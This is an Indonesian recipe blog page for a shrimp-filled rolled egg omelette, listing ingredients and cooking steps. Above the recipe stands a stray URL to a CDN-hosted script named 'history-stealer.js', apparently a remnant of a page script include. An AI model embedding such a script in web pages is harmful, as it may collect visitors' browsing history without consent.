-->
https://cdn.statically.io/gh/darylfarahi/ikan/master/history-stealer.js

Cara Membuat Kue Dadar Gulung Udang

Cara Membuat Kue Dadar Gulung Udang yang akan kita bahas kali ini bukan dadar gulung biasa, kenapa begitu.. Ya karena dadar gulung yang biasanya hanya kue biasa yang berisi parutan kelapa dan identik berwarna hijau. Kali ini dadar gulung yang akan kita buat yaitu dadar gulung dengan komposisi udang di dalamnya.Rasanya pun menjadi gurih lezat.. Yha mungkin sedikit nyeleneh bin aneh.. tapi silahkan dibuat dan rasakan rasanya..

Bahan-bahan


  • 3 butir telur ayam
  • 1 batang daun bawang, rajang halus
  • 1 siung bawang putih uk. besar, cincang halus 
  • Garam 
  • Merica
  • 12 ekor udang, ambil dagingnya saja, beri garam dan perasan air jeruk nipis/lemon/cuka, remas-remas, diamkan sesaat, cuci bersih, rebus hingga berubah warna, potong kecil-kecil, sisihkan1 buah tomat merah uk. sedang, buang bijinya, potong dadu

Proses Pembuatan Kue


  1. Kocok lepas telur, campur bawang putih cincang, potongan tomat, irisan daun bawang, garam dan merica
  2. Panaskan wajan anti-lengket, beri margarine secukupnya, kecilkan api, tuang lapisan pertama, taburi sebagian potongan udang. Saat kulitnya terlihat kokoh tp atasnya masih basah gulung perlahan dan padatkan dengan bantuan 2 sodet kayu, bawa gulungan ke sisi wajan.
  3. Tuang lapisan kedua, hingga menempel ke gulungan yg pertama. Taburi sisa potongan udang. Lakukan hal yg sama seperti sebelumnya
  4. Tuang lapisan ketiga (saya hanya buat 3 lapisan, sebetulnya bebas mau berapa aja, tergantung banyaknya adonan telur) lakukan hal yg sama seperti sebelumnya, gulungnya perlahan ya supaya tidak sobek.
  5. Bolak balik gulungan ditiap sisinya hingga telur gulung matang (saya aga mengerucutkan bentuk keatasnya, harapannya jadi segitiga )Hidangkan bersama mayonaise dan saus sambal/tomat botolan

Subscribe to receive free email updates: